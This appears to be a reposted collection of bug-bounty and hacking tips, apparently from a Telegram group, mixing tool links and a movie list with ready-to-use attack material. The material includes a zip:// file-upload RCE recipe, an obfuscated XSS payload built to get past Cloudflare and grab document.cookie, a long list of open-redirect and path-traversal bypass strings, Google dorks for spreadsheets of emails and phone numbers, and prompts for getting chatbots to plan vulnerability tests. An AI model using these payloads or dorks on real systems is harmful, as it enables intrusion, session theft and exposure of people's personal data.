Termux All Command [Telegram Group]

Dork Generator : https://dorks.s1rn3tz.ovh/

30 Movies Every Programmer Must Watch 😲 1. The Social Network (2010) 2. Steve Jobs (2015) 3. Pirates of Silicon Valley (1999) 4. The Imitation Game (2014) 5. Hackers (1995) 6. Ex Machina (2014) 7. Her (2013) 8. Tron (1982) 9. Tron: Legacy (2010) 10. The Matrix (1999) 11. WarGames (1983) 12. Sneakers (1992) 13. Jobs (2013) 14. Antitrust (2001) 15. Blackhat (2015) 16. The Fifth Estate (2013) 17. The Circle (2017) 18. Silicon Valley (TV Series, 2014–2019) 19. Source Code (2011) 20. Chappie (2015) 21. Mr. Robot (TV Series, 2015–2019) 22. Ghost in the Shell (1995) 23. Minority Report (2002) 24. Transcendence (2014) 25. Ready Player One (2018) 26. Artificial Intelligence: AI (2001) 27. Revolt (2017) 28. The Thirteenth Floor (1999) 29. Eagle Eye (2008) 30. Terminator 2: Judgment Day (1991)

Subdomain Enumeration ✨💫 NODESUB: A command-line tool for finding subdomains in bug bounty programs. It supports various subdomain enumeration techniques and provides flexible options for customization TOOL GITHUB LINK: https://lnkd.in/dDmfMwPy

🔖 Dnsbruter - A powerful tool for active subdomain enumeration and discovery. ✨ Features: Dnsbruter uses DNS resolution to bruteforce and identify subdomains efficiently. Its multithreading capability allows users to control concurrency for faster and more effective results. Perfect for researchers and pen testers targeting domain reconnaissance. 🔗 https://github.com/RevoltSecurities/Dnsbruter/

Test for RCE on File Uploads: 1. Create a .php file (e.g. payload.php). 2. Compress it into a zip file (e.g . test.zip). 3. Upload your zip file to the vulnerable web application. 4. Trigger the RCE via the following URL: https://<target.com>/index.php?page=zip:// path/test.zip%23payload.php

XSS Cloudflare Bypass javascript​:alert(1) ❌ *alert cannot be combined with () javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie ❌ *but still forbidden try unicode escape: javascript%3Avar%7Ba%3A%5Cu006f%5Cu006e%5Cu0065%5Cu0072%5Cu0072%5Cu006f%5Cu0072%7D%3D%7Ba%3A%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%7D%3Bthrow%2520\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074.\u0063\u006f\u006f\u006b\u0069\u0065 ✅✅😹

⚡️SqliSniper: Advanced Time-based Blind SQL Injection fuzzer for HTTP Headers https://github.com/danialhalo/SqliSniper

☄️You can try this effective manual openredirect Bypass☄️ 1. Null-byte injection: - /google.com%00/ - //google.com%00 2. Base64 encoding variations: - aHR0cDovL2dvb2dsZS5jb20= - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ== - //base64:d3d3Lmdvb2dsZS5jb20=/ 3. Case-sensitive variations: - //GOOGLE.com/ - //GoOgLe.com/ 4. Overlong UTF-8 sequences: - %C0%AE%C0%AE%2F (overlong encoding for ../) - %C0%AF%C0%AF%2F%2Fgoogle.com 5. Mixed encoding schemes: - /%68%74%74%70://google.com - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D - //base64:%2F%2Fgoogle.com/ 6. Alternative domain notations: - //google.com@127.0.0.1/ - //127.0.0.1.xip.io/ - //0x7F000001/ (hexadecimal IP) 7. Trailing special characters: - //google.com/#/ - //google.com/;&/ - //google.com/?id=123&// 8. Octal IP address format: - http://0177.0.0.1/ - http://00177.0000.0000.0001/ 9. IP address variants: - http://3232235777 (decimal notation of an IP) - http://0xC0A80001 (hex notation of IP) - http://192.168.1.1/ 10. Path traversal with encoding: - /..%252f..%252f..%252fetc/passwd - /%252e%252e/%252e%252e/%252e%252e/etc/passwd - /..%5c..%5c..%5cwindows/system32/cmd.exe 11. Alternate protocol inclusion: - ftp://google.com/ - javascript:alert(1)//google.com 12. Protocol-relative URLs: - :////google.com/ - :///google.com/ 13. Redirection edge cases: - //google.com/?q=//bing.com/ - //google.com?q=https://another-site.com/ 14. IPv6 notation: - http://[::1]/ - http://[::ffff:192.168.1.1]/ 15. Double URL encoding: - %252f%252fgoogle.com (encoded twice) - %255cgoogle.com 16. Combined traversal & encoding: - /%2E%2E/%2E%2E/etc/passwd - /%2e%2e%5c%2e%2e/etc/passwd 17. Reverse DNS-based: - https://google.com.reverselookup.com - //lookup-reversed.google.com/ 18. Non-standard ports: - http://google.com:81/ - https://google.com:444/ 19. Unicode obfuscation in paths: - /%E2%80%8Egoogle.com/ - /%C2%A0google.com/ 20. Query parameters obfuscation: - //google.com/?q=http://another-site.com/ - //google.com/?redirect=https://google.com/ 21. Using @ symbol for userinfo: - https://admin:password@google.com/ - http://@google.com 22. Combination of userinfo and traversal: - https://admin:password@google.com/../../etc/passwd

Google Dork site:target.com ext:xlsx "name" "@gmail.com" "phone"

GoSearch - OSINT tool for searching people's digital footprint and leaked passwords across various social networks, written in Go. GitHub: https://github.com/ibnaleem/gosearch

🔰 Summarize YouTube Videos Ultimately 🔰 First, add this extension on your browser https://keywordseverywhere.com/ Then open YouTube and see on the right side you will see 3 options use ChatGPT, use Claude, and use Gemini you can use any of them among 3 Summarize Videos and Save your precious time!

Bug Bounty Tip : XML External Entity(XXE) 1.Go to the file upload functionality in the application. 2.Upload a XML file ]> &xxe; 3.Use Burp Suite to intercept the request and modify content type. hashtag#bugbounty

Nmap all collection : https://github.com/emadshanab/Nmap-NSE-scripts-collection

XXEinjector Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods. TOOL GITHUB LINK: https://lnkd.in/fB3_S6d

dnsReaper dnsReaper: subdomain takeover tool for attackers, bug bounty hunters and the blue team TOOL GITHUB LINK: https://lnkd.in/e-39S78D

📍List of tips I shared on X recently 🪲Google Dorks site:*.redacted[.]com inurl:web inurl:guest site:*.redacted[.]com "Welcome to" "Sign in with Microsoft" site:*.redacted[.]com inurl:debug inurl:& site:*.redacted[.]com inurl:debug inurl:? site:*.redacted[.]com inurl:debug inurl:= site:*.redacted[.]com inurl:debug inurl:true ⛏️Add to your wordlist /tunnel-web/secure/webdav /tunnel-web/secure/webdav/guest /gsm 🔍Waymore Grep cat urls.txt | grep "debug=" 🤖Prompts [1] I have 20 urls that contains the keyword "rss", any specific vulnerability you would suggest here to test first? [2] Ok, now explain the vulnerability testing procedure using detailed request and response application flow [3] Ok, any hidden test case not tested by majority and overlooked? 🐞Learn Bing Dorking [1] https://lnkd.in/g92WC4HW [2] https://lnkd.in/g2HBqZ2S [3] https://lnkd.in/gmKJ-b3e [4] https://lnkd.in/gP553puY 💉Learn SPARQL Injection [1] https://lnkd.in/gT9e77iz [2] https://lnkd.in/gUmmFveY [3] https://lnkd.in/gXfXmzZu [4] https://lnkd.in/gNtE9Pr4